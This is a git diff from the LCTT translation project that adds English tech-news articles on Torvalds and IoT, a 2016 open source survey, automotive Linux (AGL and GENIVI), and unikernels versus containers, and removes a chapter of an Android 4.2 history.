+“Maybe you won’t see Linux at the IoT leaf nodes, but anytime you have a hub, you will need it,” Torvalds told Hohndel. “You need smart devices especially if you have 23 [IoT standards]. If you have all these stupid devices that don’t necessarily run Linux, and they all talk with slightly different standards, you will need a lot of smart devices. We will never have one completely open standard, one ring to rule them all, but you will have three of four major protocols, and then all these smart hubs that translate.”
+
+Torvalds remained customarily philosophical when Hohndel asked about the gaping security holes in IoT. “I don’t worry about security because there’s not a lot we can do,” he said. “IoT is unpatchable -- it’s a fact of life.”
+
+The Linux creator seemed more concerned about the lack of timely upstream contributions from one-off embedded projects, although he noted there have been significant improvements in recent years, partially due to consolidation on hardware.
+
+“The embedded world has traditionally been hard to interact with as an open source developer, but I think that’s improving,” Torvalds said. “The ARM community has become so much better. Kernel people can now actually keep up with some of the hardware improvements. It’s improving, but we’re not nearly there yet.”
+
+Torvalds admitted to being more at home on the desktop than in embedded and to having “two left hands” when it comes to hardware.
+
+“I’ve destroyed things with a soldering iron many times,” he said. “I’m not really set up to do hardware.” On the other hand, Torvalds guessed that if he were a teenager today, he would be fiddling around with a Raspberry Pi or BeagleBone. “The great part is if you’re not great at soldering, you can just buy a new one.”
+
+Meanwhile, Torvalds vowed to continue fighting for desktop Linux for another 25 years. “I’ll wear them down,” he said with a smile.
+
+Watch the full video, below.
+
+Get the Latest on Embedded Linux and IoT. Access 150+ recorded sessions from Embedded Linux Conference 2016. [Watch Now][1].
+
+[video](https://youtu.be/tQKUWkR-wtM)
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/news/linus-torvalds-talks-iot-smart-devices-security-concerns-and-more-video
+
+作者:[ERIC BROWN][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.linux.com/users/ericstephenbrown
+[0]: http://events.linuxfoundation.org/events/embedded-linux-conference
+[1]: http://go.linuxfoundation.org/elc-openiot-summit-2016-videos?utm_source=lf&utm_medium=blog&utm_campaign=linuxcom
diff --git a/sources/talk/20160510 65% of companies are contributing to open source projects.md b/sources/talk/20160510 65% of companies are contributing to open source projects.md
new file mode 100644
index 0000000000..ad3b4ef680
--- /dev/null
+++ b/sources/talk/20160510 65% of companies are contributing to open source projects.md
@@ -0,0 +1,63 @@
+65% of companies are contributing to open source projects
+==========================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_openseries.png?itok=s7lXChId)
+
+This year marks the 10th annual Future of Open Source Survey to examine trends in open source, hosted by Black Duck and North Bridge. The big takeaway from the survey this year centers around the mainstream acceptance of open source today and how much has changed over the last decade.
+
+The [2016 Future of Open Source Survey][1] analyzed responses from nearly 3,400 professionals. Developers made their voices heard in the survey this year, comprising roughly 70% of the participants. The group that showed exponential growth was security professionals, whose participation increased by over 450%. Their participation shows the increasing interest in ensuring that the open source community pays attention to security issues in open source software and securing new technologies as they emerge.
+
+Black Duck's [Open Source Rookies][2] of the Year awards identify some of these emerging technologies, like Docker and Kontena in containers. Containers themselves have seen huge growth this year–76% of respondents say their company has some plans to use containers. And an amazing 59% of respondents are already using containers in a variety of deployments, from development and testing to internal and external production environment. The developer community has embraced containers as a way to get their code out quickly and easily.
+
+It's not surprising that the survey shows a minuscule number of organizations having no developers contributing to open source software. When large corporations like Microsoft and Apple open source some of their solutions, developers gain new opportunities to participate in open source. I certainly hope this trend will continue, with more software developers contributing to open source projects at work and outside of work.
+
+### Highlights from the 2016 survey
+
+#### Business value
+
+* Open source is an essential element in development strategy with more than 65% of respondents relying on open source to speed development.
+* More than 55% leverage open source within their production environments.
+
+#### Engine for innovation
+
+* Respondents reported use of open source to drive innovation through faster, more agile development; accelerated time to market and vastly superior interoperability.
+* Additional innovation is afforded by open source's quality of solutions; competitive features and technical capabilities; and ability to customize.
+
+#### Proliferation of open source business models and investment
+
+* More diverse business models are emerging that promise to deliver more value to open source companies than ever before. They are not as dependent on SaaS and services/support.
+* Open source private financing has increased almost 4x in five years.
+
+#### Security and management
+
+The development of best-in-class open source security and management practices has not kept pace with growth in adoption. Despite a proliferation of expensive, high-profile open source breaches in recent years, the survey revealed that:
+
+* 50% of companies have no formal policy for selecting and approving open source code.
+* 47% of companies don’t have formal processes in place to track open source code, limiting their visibility into their open source and therefore their ability to control it.
+* More than one-third of companies have no process for identifying, tracking or remediating known open source vulnerabilities.
+
+#### Open source participation on the rise
+
+The survey revealed an active corporate open source community that spurs innovation, delivers exponential value and shares camaraderie:
+
+* 67% of respondents report actively encouraging developers to engage in and contribute to open source projects.
+* 65% of companies are contributing to open source projects.
+* One in three companies have a fulltime resource dedicated to open source projects.
+* 59% of respondents participate in open source projects to gain competitive edge.
+
+Black Duck and North Bridge learned a great deal this year about security, policy, business models and more from the survey, and we’re excited to share these findings. Thank you to our many collaborators and all the respondents for taking the time to take the survey. It’s been a great ten years, and I am happy that we can safely say that the future of open source is full of possibilities.
+
+Learn more, see the [full results][3].
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/16/5/2016-future-open-source-survey
+
+作者:[Haidee LeClair][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/blackduck2016
+[1]: http://www.slideshare.net/blackducksoftware/2016-future-of-open-source-survey-results
+[2]: https://info.blackducksoftware.com/OpenSourceRookies2015.html
+[3]: http://www.slideshare.net/blackducksoftware/2016-future-of-open-source-survey-results%C2%A0
diff --git a/sources/talk/20160516 Linux will be the major operating system of 21st century cars.md b/sources/talk/20160516 Linux will be the major operating system of 21st century cars.md
new file mode 100644
index 0000000000..ec7a33aaa6
--- /dev/null
+++ b/sources/talk/20160516 Linux will be the major operating system of 21st century cars.md
@@ -0,0 +1,38 @@
+Linux will be the major operating system of 21st century cars
+===============================================================
+
+>Cars are more than engines and good looking bodies. They're also complex computing devices so, of course, Linux runs inside them.
+
+Linux doesn't just run your servers and, via Android, your phones. It also runs your cars. Of course, no one has ever bought a car for its operating system. But Linux is already powering the infotainment, heads-up display and connected car 4G and Wi-Fi systems for such major car manufacturers as Toyota, Nissan, and Jaguar Land Rover and [Linux is on its way to Ford][1], Mazda, Mitsubishi, and Subaru cars.
+
+![](http://zdnet4.cbsistatic.com/hub/i/2016/05/10/743f0c14-6458-4d1e-8723-d2d94d0d0e69/c297b7d52e27e97d8721d4cb46bb371b/agl-logo.jpg)
+>All the Linux and open-source car software efforts have now been unified under the Automotive Grade Linux project.
+
+Software companies are also getting into this Internet of mobile things act. Movimento, Oracle, Qualcomm, Texas Instruments, UIEvolution and VeriSilicon have all [joined the Automotive Grade Linux (AGL)][2] project. The [AGL][3] is a collaborative open-source project devoted to creating a common, Linux-based software stack for the connected car.
+
+"AGL has seen tremendous growth over the past year as demand for connected car technology and infotainment are rapidly increasing," said Dan Cauchy, the Linux Foundation's General Manager of Automotive, in a statement.
+
+Cauchy continued, "Our membership base is not only growing rapidly, but it is also diversifying across various business interests, from semiconductors and in-vehicle software to IoT and connected cloud services. This is a clear indication that the connected car revolution has broad implications across many industry verticals."
+
+These companies have joined after AGL's recent announcement of a new AGL Unified Code Base (UCB). This new Linux distribution is based on AGL and two other car open-source projects: [Tizen][4] and the [GENIVI Alliance][5]. UCB is a second-generation car Linux. It was built from the ground up to address automotive-specific applications. It handles navigation, communications, safety, security and infotainment functionality.
+
+"The automotive industry needs a standard open operating system and framework to enable automakers and suppliers to quickly bring smartphone-like capabilities to the car," said Cauchy. "This new distribution integrates the best components from AGL, Tizen, GENIVI and related open-source code into a single AGL Unified Code Base, allowing car-makers to leverage a common platform for rapid innovation. The AGL UCB distribution will play a huge role in the adoption of Linux-based systems for all functions in the vehicle."
+
+He's right. Since its release in January 2016, four car companies and ten new software businesses have joined AGL. Esso, now Exxon, made the advertising slogan, "Put a tiger in your tank!" famous. I doubt that "Put a penguin under your hood" will ever become well-known, but that's exactly what's happening. Linux is well on its way to becoming the major operating system of 21st century cars.
+
+------------------------------------------------------------------------------
+
+via: http://www.zdnet.com/article/the-linux-in-your-car-movement-gains-momentum/
+
+作者:[Steven J. Vaughan-Nichols][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
+[1]: https://www.automotivelinux.org/news/announcement/2016/01/ford-mazda-mitsubishi-motors-and-subaru-join-linux-foundation-and
+[2]: https://www.automotivelinux.org/news/announcement/2016/05/oracle-qualcomm-innovation-center-texas-instruments-and-others-support
+[3]: https://www.automotivelinux.org/
+[4]: https://www.tizen.org/
+[5]: http://www.genivi.org/
diff --git a/sources/talk/20160523 Driving cars into the future with Linux.md b/sources/talk/20160523 Driving cars into the future with Linux.md
new file mode 100644
index 0000000000..38ef546789
--- /dev/null
+++ b/sources/talk/20160523 Driving cars into the future with Linux.md
@@ -0,0 +1,104 @@
+Driving cars into the future with Linux
+===========================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/open-snow-car-osdc-lead.png?itok=IgYZ6mNY)
+
+I don't think much about it while I'm driving, but I sure do love that my car is equipped with a system that lets me use a few buttons and my voice to call my wife, mom, and children. That same system allows me to choose whether I listen to music streaming from the cloud, satellite radio, or the more traditional AM/FM radio. I also get weather updates and can direct my in-vehicle GPS to find the fastest route to my next destination. [In-vehicle infotainment][1], or IVI as it's known in the industry, has become ubiquitous in today's newest automobiles.
+
+A while ago, I had to travel hundreds of miles by plane and then rent a car. Happily, I discovered that my rental vehicle was equipped with IVI technology similar to my own car. In no time, I was connected via Bluetooth, had uploaded my contacts into the system, and was calling home to let my family know I arrived safely and my hosts to let them know I was en route to their home.
+
+In a recent [news roundup][2], Scott Nesbitt cited an article that said Ford Motor Company is getting substantial backing from a rival automaker for its open source [Smart Device Link][3] (SDL) middleware framework, which supports mobile phones. SDL is a project of the [GENIVI Alliance][4], a nonprofit committed to building middleware to support open source in-vehicle infotainment systems. According to [Steven Crumb][5], executive director of GENIVI, their [membership][6] is broad and includes Daimler Group, Hyundai, Volvo, Nissan, Honda, and 170 others.
+
+In order to remain competitive in the industry, automotive companies need a middleware system that can support the various human machine interface technologies available to consumers today. Whether you own an Android, iOS, or other device, automotive OEMs want their units to be able to support these systems. Furthermore, these IVI systems must be adaptable enough to support the ever decreasing half-life of mobile technology. OEMs want to provide value and add services in their IVI stacks that will support a variety of options for their customers. Enter Linux and open source software.
+
+In addition to GENIVI's efforts, the [Linux Foundation][7] sponsors the [Automotive Grade Linux][8] (AGL) workgroup, a software foundation dedicated to finding open source solutions for automotive applications. Although AGL will initially focus on IVI systems, they envision branching out to include [telematics][9], heads up displays, and other control systems. AGL has over 50 members at this time, including Jaguar, Toyota, and Nissan, and in a [recent press release][10] announced that Ford, Mazda, Mitsubishi, and Subaru have joined.
+
+To find out more, we interviewed two leaders in this emerging field. Specifically, we wanted to know how Linux and open source software are being used and if they are in fact changing the face of the automotive industry. First, we talk to [Alison Chaiken][11], a software engineer at Peloton Technology and an expert on automotive Linux, cybersecurity, and transparency. She previously worked for Mentor Graphics, Nokia, and the Stanford Linear Accelerator. Then, we chat with [Steven Crumb][12], executive director of GENIVI, who got started in open source in high-performance computing environments (supercomputers and early cloud computing). He says that though he's not a coder anymore, he loves to help organizations solve real business problems with open source software.
+
+### Interview with Alison Chaiken (by [Deb Nicholson][13])
+
+#### How did you get interested in the automotive software space?
+
+I was working on [MeeGo][14] in phones at Nokia in 2009 when the project was cancelled. I thought, what's next? A colleague was working on [MeeGo-IVI][15], an early automotive Linux distribution. "Linux is going to be big in cars," I thought, so I headed in that direction.
+
+#### Can you tell us what aspects you're working on these days?
+
+I'm currently working for a startup on an advanced cruise control system that uses real-time Linux to increase the safety and fuel economy of big-rig trucks. I love working in this area, as no one would disagree that trucking can be improved.
+
+#### There have been a few stories about hacked cars in recent years. Can open source solutions help address this issue?
+
+I presented a talk on precisely this topic, on how Linux can (and cannot) contribute to security solutions in the automotive space, at Southern California Linux Expo 2016 ([Slides][16]). Notably, GENIVI and Automotive Grade Linux have published their code and both projects take patches via Git. Please send your fixes upstream! Many eyes make all bugs shallow.
+
+#### Law enforcement agencies and insurance companies could find plenty of uses for data about drivers. How easy will it be for them to obtain this information?
+
+Good question. The Dedicated Short Range Communication Standard (IEEE-1609) takes great pains to keep drivers participating in Wi-Fi safety messaging anonymous. Still, if you're posting to Twitter from your car, someone will be able to track you.
+
+#### What can developers and private citizens do to make sure civil liberties are protected as automotive technology evolves?
+
+The Electronic Frontier Foundation (EFF) has done an excellent job of keeping on top of automotive issues, having commented through official channels on what data may be stored in automotive "black boxes" and on how DMCA's Provision 1201 applies to cars.
+
+#### What are some of the exciting things you see coming for drivers in the next few years?
+
+Adaptive cruise control and collision avoidance systems are enough of an advance to save lives. As they roll out through vehicle fleets, I truly believe that fatalities will decline. If that's not exciting, I don't know what is. Furthermore, capabilities like automated parking assist will make cars easier to drive and reduce fender-benders.
+
+#### What needs to be built and how can people get involved?
+
+Automotive Grade Linux is developed in the open and runs on cheap hardware (e.g. Raspberry Pi 2 and moderately priced Renesas Porter board) that anyone can buy. GENIVI automotive Linux middleware consortium has lots of software publicly available via Git. Furthermore, there is the ultra cool [OSVehicle open hardware][17] automotive platform.
+
+There are many ways for Linux software and open hardware folks with moderate budgets to get involved. Join us at #automotive on Freenode IRC if you have questions.
+
+### Interview with Steven Crumb (by Don Watkins)
+
+#### What's so huge about GENIVI's approach to IVI?
+
+GENIVI filled a huge gap in the automotive industry by pioneering the use of free and open source software, including Linux, for non-safety-critical automotive software like in-vehicle infotainment (IVI) systems. As consumers came to expect the same functionality in their vehicles as on their smartphones, the amount of software required to support IVI functions grew exponentially. The increased amount of software has also increased the costs of building the IVI systems and thus slowed time to market.
+
+GENIVI's use of open source software and a community development model has saved automakers and their software suppliers significant amounts of money while significantly reducing the time to market. I'm excited about GENIVI because we've been fortunate to lead a revolution of sorts in the automotive industry by slowly evolving organizations from a highly structured and proprietary methodology to a community-based approach. We're not done yet, but it's been a privilege to take part in a transformation that is yielding real benefits.
+
+#### How do your major members drive the direction of GENIVI?
+
+GENIVI has a lot of members and non-members contributing to our work. As with many open source projects, any company can influence the technical output by simply contributing code, patches, and time to test. With that said, BMW, Mercedes-Benz, Hyundai Motor, Jaguar Land Rover, PSA, Renault/Nissan, and Volvo are all active adopters of and contributors to GENIVI—and many other OEMs have IVI solutions in their cars that extensively use GENIVI's software.
+
+#### What licenses cover the contributed code?
+
+GENIVI employs a number of licenses ranging from (L)GPLv2 to MPLv2 to Apache 2.0. Some of our tools use the Eclipse license. We have a [public licensing policy][18] that details our licensing preferences.
+
+#### How does a person or group get involved? How important are community contributions to the ongoing success of the project?
+
+GENIVI does its development completely in the open ([projects.genivi.org][19]) and thus, anyone interested in using open software in automotive is welcome to participate. That said, the alliance can fund its continued development in the open through companies [joining GENIVI][20] as members. GENIVI members enjoy a wide variety of benefits, not the least of which is participation in the global community of 140 companies that has been developed over the last six years.
+
+Community is hugely important to GENIVI, and we could not have produced and maintained the valuable software we developed over the years without an active community of contributors. We've worked hard to make contributing to GENIVI as simple as joining an [email list][21] and connecting to the people in the various software projects. We use standard practices employed by many open source projects and provide high-quality tools and infrastructure to help developers feel at home and be productive.
+
+Regardless of someone's familiarity with automotive software, they are welcome to join our community. People have modified cars for years, so for many people there is a natural draw to anything automotive. Software is the new domain for cars, and GENIVI wants to be the open door for anyone interested in working with automotive, open source software.
+
+-------------------------------
+via: https://opensource.com/business/16/5/interview-alison-chaiken-steven-crumb
+
+作者:[Don Watkins][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/don-watkins
+[1]: https://en.wikipedia.org/wiki/In_car_entertainment
+[2]: https://opensource.com/life/16/1/weekly-news-jan-9
+[3]: http://projects.genivi.org/smartdevicelink/home
+[4]: http://www.genivi.org/
+[5]: https://www.linkedin.com/in/stevecrumb
+[6]: http://www.genivi.org/genivi-members
+[7]: http://www.linuxfoundation.org/
+[8]: https://www.automotivelinux.org/
+[9]: https://en.wikipedia.org/wiki/Telematics
+[10]: https://www.automotivelinux.org/news/announcement/2016/01/ford-mazda-mitsubishi-motors-and-subaru-join-linux-foundation-and
+[11]: https://www.linkedin.com/in/alison-chaiken-3ba456b3
+[12]: https://www.linkedin.com/in/stevecrumb
+[13]: https://opensource.com/users/eximious
+[14]: https://en.wikipedia.org/wiki/MeeGo
+[15]: http://webinos.org/deliverable-d026-target-platform-requirements-and-ipr/automotive/
+[16]: http://she-devel.com/Chaiken_automotive_cybersecurity.pdf
+[17]: https://www.osvehicle.com/
+[18]: http://projects.genivi.org/how
+[19]: http://projects.genivi.org/
+[20]: http://genivi.org/join
+[21]: http://lists.genivi.org/mailman/listinfo/genivi-projects
diff --git a/sources/talk/20160525 What containers and unikernels can learn from Arduino and Raspberry Pi.md b/sources/talk/20160525 What containers and unikernels can learn from Arduino and Raspberry Pi.md
new file mode 100644
index 0000000000..a1d6257d4d
--- /dev/null
+++ b/sources/talk/20160525 What containers and unikernels can learn from Arduino and Raspberry Pi.md
@@ -0,0 +1,51 @@
+What containers and unikernels can learn from Arduino and Raspberry Pi
+==========================================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/bus-containers.png?itok=vM7_7vs0)
+
+
+Just the other day, I was speaking with a friend who is a mechanical engineer. He works on computer-assisted braking systems for semi trucks and mentioned that his company has [Arduinos][1] all over the office. The idea is to encourage people to quickly experiment with new ideas. He also mentioned that Arduinos are more expensive than printed circuits. I was surprised by his comment about price, because coming from the software side of things, my perception of Arduinos was that they cost less than designing a specialized circuit.
+
+I had always viewed [Arduinos][2] and [Raspberry Pi][3] as these cool, little, specialized devices that can be used to make all kinds of fun gadgets. I came from the software side of the world and have always considered Linux on x86 and x86-64 "general purpose." The truth is, Arduinos are not specialized. In fact, they are very general purpose. They are fairly small, fairly cheap, and extremely flexible—that's why they caught on like wildfire. They have all kinds of I/O ports and expansion cards. They allow a maker to go out and build something cool really quickly. They even allow companies to build new products quickly.
+
+The unit price for an Arduino is much higher than a printed circuit, but time to a minimum viable idea is much lower. With a printed circuit, the unit price can be driven much lower but the upfront capital investment is much higher. So, long story short, the answer is—it depends.
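+
+A back-of-the-envelope way to see where "it depends" tips (the dollar figures below are invented for illustration, not real Arduino or fabrication prices): total cost is roughly the up-front investment plus the unit price times volume, so the crossover volume is the printed circuit's up-front cost divided by the per-unit savings.
+
+    # Hypothetical numbers: Arduino at $25/unit with ~$0 up front;
+    # custom printed circuit at $5/unit with $10,000 of up-front design.
+    # Crossover volume = upfront / (unit_arduino - unit_pcb)
+    echo $((10000 / (25 - 5)))    # prints 500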
+
+### Unikernels, rump kernels, and container hosts
+
+Enter unikernels, rump kernels, and minimal Linux distributions—these operating systems are purpose-built for specific use cases. These specialized operating systems are kind of like printed circuits. They require some up-front investment in planning and design to utilize, but could provide a great performance increase when deploying a specific workload at scale.
+
+Minimal operating systems such as Red Hat Enterprise Linux Atomic or CoreOS are purpose-built to run containers. They are small, quick, easily configured at boot time, and run containers quite well. The downside is that they require extra engineering to add third-party extensions such as monitoring agents or tools for virtualization. Some side-loaded tooling needs to be redesigned as super-privileged containers. This extra engineering could be worth it if you are building a big enough container environment, but might not be necessary to just try out containers.
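+
+As a concrete sketch of the super-privileged container idea (the image name below is a placeholder, not a real project; the flags are standard Docker options): instead of installing a monitoring agent directly on the minimal host, you hand a containerized agent the host's namespaces and filesystem explicitly.
+
+    # Hypothetical monitoring agent run as a super-privileged container.
+    # --privileged, --pid=host, and --net=host give it the host's devices,
+    # process table, and network stack; -v /:/host:ro exposes the host
+    # filesystem read-only inside the container.
+    docker run -d --name monitor \
+        --privileged --pid=host --net=host \
+        -v /:/host:ro \
+        example.com/monitor-agent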
+
+Containers provide the ability to run standard workloads (things built on [glibc][4], etc.). The advantage is that the workload artifact (Docker image) can be built and tested on your desktop and deployed in production on completely different hardware or in the cloud with confidence that it will run with the same characteristics. In the production environment, container hosts are still configured by the operations teams, but the application is controlled by the developer. This is sort of a best-of-both-worlds arrangement.
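+
+A minimal sketch of that build-once, run-anywhere workflow (the image and registry names are invented for illustration):
+
+    # On the developer's desktop: build, test, and publish one artifact.
+    docker build -t registry.example.com/myapp:1.0 .
+    docker run --rm registry.example.com/myapp:1.0
+    docker push registry.example.com/myapp:1.0
+
+    # On the production container host (different hardware or cloud),
+    # the exact same image is pulled and run.
+    docker pull registry.example.com/myapp:1.0
+    docker run -d registry.example.com/myapp:1.0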
+
+Unikernels and rump kernels are also purpose-built, but go a step further. The entire operating system is configured at build time by the developer or architect. This has benefits and challenges.
+
+One benefit is that the developer can control a lot about how the workload will run. Theoretically, a developer could try out [different TCP stacks][5] for different performance characteristics and choose the best one. The developer can configure the IP address ahead of time or have the system configure itself at boot with DHCP. The developer can also cut out anything that is not necessary for their application. There is also the promise of increased performance because of less [context switching][6].
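+
+To make "configured at build time" concrete, here is a purely hypothetical build invocation (not the syntax of any real unikernel toolchain) showing how decisions that would normally belong to operations get baked in when the image is compiled:
+
+    # Hypothetical toolchain and flags, for illustration only: the TCP
+    # stack and addressing are chosen at compile time, and anything not
+    # requested simply does not exist in the resulting image.
+    unikernel-build myapp.c \
+        --tcp-stack=lwip \
+        --ip=static,10.0.0.5/24 \
+        --no-shell --no-usb \
+        -o myapp.image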
+
+There are also challenges with unikernels. Currently, there is a lot of tooling missing. It's much like the printed circuit world right now. A developer has to invest a lot of time and energy discerning whether all of the right libraries exist, or they have to change the way their application works. There may also be challenges with how the "embedded" operating system is configured at runtime. Finally, every time a major change is made to the OS, it requires [going back to the developer][7] to change it. This is not a clean separation between development and operations, so I envision some organizational changes being necessary to truly adopt this model.
+
+### Conclusion
+
+There is a lot of interesting buzz around specialized container hosts, rump kernels, and unikernels because they hold the potential to revolutionize certain workloads (embedded, cloud, etc.). Keep a cautious eye on this exciting, fast-moving space.
+
+Currently, unikernels seem quite similar to building printed circuits. They require a lot of up-front investment to utilize and are very specialized, providing benefits for certain workloads. In the meantime, containers are quite interesting even for conventional workloads and don't require as much investment. Typically, an operations team should be able to port an application to containers, whereas porting an application to unikernels takes real re-engineering, and the industry is still not quite sure which workloads can be ported at all.
+
+Here's to an exciting future of containers, rump kernels, and unikernels!
+
+--------------------------------------
+via: https://opensource.com/business/16/5/containers-unikernels-learn-arduino-raspberry-pi
+
+作者:[Scott McCarty][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/fatherlinux
+[1]: https://opensource.com/resources/what-arduino
+[2]: https://opensource.com/life/16/4/arduino-day-3-projects
+[3]: https://opensource.com/resources/what-raspberry-pi
+[4]: https://en.wikipedia.org/wiki/GNU_C_Library
+[5]: http://www.eetasia.com/ARTICLES/2001JUN/2001JUN18_NTEK_CT_AN5.PDF
+[6]: https://en.wikipedia.org/wiki/Context_switch
+[7]: http://developers.redhat.com/blog/2016/05/18/3-reasons-i-should-build-my-containerized-applications-on-rhel-and-openshift/
diff --git a/sources/talk/The history of Android/22 - The history of Android.md b/sources/talk/The history of Android/22 - The history of Android.md
deleted file mode 100644
index fab3d8c087..0000000000
--- a/sources/talk/The history of Android/22 - The history of Android.md
+++ /dev/null
@@ -1,86 +0,0 @@
-alim0x translating
-
-The history of Android
-================================================================================
-### Android 4.2, Jelly Bean—new Nexus devices, new tablet interface ###
-
-The Android Platform was rapidly maturing, and with Google hosting more and more apps in the Play Store, there was less and less that needed to go out in the OS update. Still, the relentless march of updates had to continue, and in November 2012 Android 4.2 was released. 4.2 was still called "Jelly Bean," a nod to the relatively small number of changes that were present in this release.
-
-![The LG-made Nexus 4 and Samsung-made Nexus 10.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/unnamed.jpg)
-The LG-made Nexus 4 and Samsung-made Nexus 10.
-Photo by Google/Ron Amadeo
-
-Along with Android 4.2 came two flagship devices, the Nexus 4 and the Nexus 10, both of which were sold direct by Google on the Play Store. The Nexus 4 applied the Nexus 7 strategy of a quality device at a shockingly low price and sold for $300 unlocked. The Nexus 4 had a quad-core 1.5 GHz Snapdragon S4 Pro, 2GB of RAM and a 4.7-inch 1280×768 LCD. Google's new flagship phone was manufactured by LG, and with the manufacturer switch came a focus on materials and build quality. The Nexus 4 had a glass front and back, and while that meant you really couldn't afford to drop it, it was one of the nicest-feeling Android phones to date. The biggest downside to the Nexus 4 was the lack of LTE at a time when most phones, including the Verizon Galaxy Nexus, came with the faster modem. Still, demand for the Nexus 4 greatly exceeded Google's expectations—the launch rush crashed the Play Store Web site on launch day. The device sold out in under an hour.
-
-The Nexus 10 was Google's first 10-inch Nexus tablet. The highlight of the device was the 2560×1600 display, which was the highest resolution in its class. All those pixels were powered by a dual core, 1.7GHz Cortex A15 processor and 2GB of RAM. With each passing month, it's looking more and more like the Nexus 10 is the first and last 10-inch Nexus tablet. Usually these devices are upgraded every year, but the Nexus 10 is now 16 months old, and there's no sign of the new model on the horizon. Google is doing well with smaller-sized 7-inch tablets, and it seems content to let partners [like Samsung][1] explore the larger end of the tablet spectrum.
-
-![The new lock screen, wallpaper, and clock widget design.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/JBvsjb.jpg)
-The new lock screen, wallpaper, and clock widget design.
-Photo by Ron Amadeo
-
-4.2 brought lots of changes to the lock screen. The font was centered and used an extremely thick weight for the hour and a thin font for the minutes. The lock screen was now paginated and could be customized with widgets. Rather than a simple clock on the lock screen, users could replace it with another widget or add extra pages to the lock screen for more widgets.
-
-![The lock screen's add widget page, the list of widgets, the Gmail widget on the lock screen, and swiping over to the camera.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/locksc2reen.jpg)
-The lock screen's add widget page, the list of widgets, the Gmail widget on the lock screen, and swiping over to the camera.
-Photo by Ron Amadeo
-
-The lock screen now worked like a stripped-down version of the home screen. Page outlines would pop up on the left and right sides of the lock screen to hint to users that they could swipe to other pages with other widgets. Swiping to the left would show a simple blank page with a plus sign in the center, and tapping on it would bring up a list of widgets that were compatible with the lock screen. Lock screens were limited to one widget per page and could be expanded or collapsed by dragging up or down on the widget. The rightmost page was reserved for the camera—a simple swipe over would open the camera interface, but you weren't able to swipe back.
-
-![The new Quick Settings panel and a composite image of the app lineup.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/42fix.png)
-The new Quick Settings panel and a composite image of the app lineup.
-Photo by Ron Amadeo
-
-One of the biggest additions to 4.2 was the new "Quick Settings" panel. Android 3.0 brought tablets a way to quickly change power settings, and 4.2 finally brought that ability to phones. A new icon was added to the top right corner of the notification panel that would switch between the normal list of notifications and the new quick settings screen. Quick Settings offered faster access to screen brightness, network connections, and battery and data usage without having to dig through the full settings screen. The top-level settings button from Android 4.1 was removed, and a square tile on the Quick Settings screen took its place.
-
-There were lots of changes to the app drawer and 4.2's lineup of apps and icons. Thanks to the wider aspect ratio of the Nexus 4 (5:3 vs 16:9 on the Galaxy Nexus), the app drawer on that device could now show a five-wide grid of icons. 4.2 replaced the stock browser with Google Chrome and the stock calendar with Google Calendar, both of which brought new icon designs. The Clock and Camera apps were revamped in 4.2, and new icons were part of the deal. "Google Settings" was a new app that offered shortcuts to all the existing Google Account settings around the OS, and it had a unified look with Google Search and the new Google+ icon. Google Maps got a new icon, and Google Latitude, which was part of Google Maps, was retired in favor of Google+ location.
-
-![The browser was replaced with Chrome, and the new camera interface with a full screen viewfinder.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/chroemcam.jpg)
-The browser was replaced with Chrome, and the new camera interface with a full screen viewfinder.
-Photo by Ron Amadeo
-
-The stock browser did its best Chrome imitation for a while—it took many cues from Chrome’s interface, adopted many Chrome features, and even used Chrome’s JavaScript engine—but by the time Android 4.2 rolled around, Google deemed the Android version of Chrome ready to replace the imitator. On the surface, it didn't seem like much of a difference; the interface looked different, and early versions of Chrome for Android didn't scroll as smoothly as the stock browser. Under the hood, though, everything was different. Development of Android's main browser was now handled by the Google Chrome team instead of being a side project of the Android team. Android's default browser moved from being a stagnant app tied to Android releases to a Play Store app that was continually updated. Today there is even a beta channel that receives several updates per month.
-
-The camera interface was redesigned. It was now a completely full-screen app, showing a live view from the camera with the controls placed on top of it. The layout aesthetic had a lot in common with the [camera design][2] of Android 1.5: minimal controls with a focus on the viewfinder output. The circle of controls in the center appeared when you either held your finger on the screen or pressed the circle icon in the bottom right corner. When holding your finger down, you could slide around to pick the options around the circle, often expanding out into a sub-menu. Releasing over a highlighted item would select it. This was clearly inspired by the Quick Controls in the Android 4.0 browser, but arranging the options in a circle meant your finger was almost always blocking part of the interface.
-
-![The clock app, which went from a two-screen app to a feature-packed, useful application.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clock-1.jpg)
-The clock app, which went from a two-screen app to a feature-packed, useful application.
-Photo by Ron Amadeo
-
-The clock application was completely revamped, going from a simple two-screen alarm clock to a world clock, alarm, timer, and stopwatch. The clock app design was like nothing Google introduced before, with an ultra-minimal aesthetic and red highlights. It seemed to be an experiment for Google. Even several versions later, this design language seemed to be confined only to this app.
-
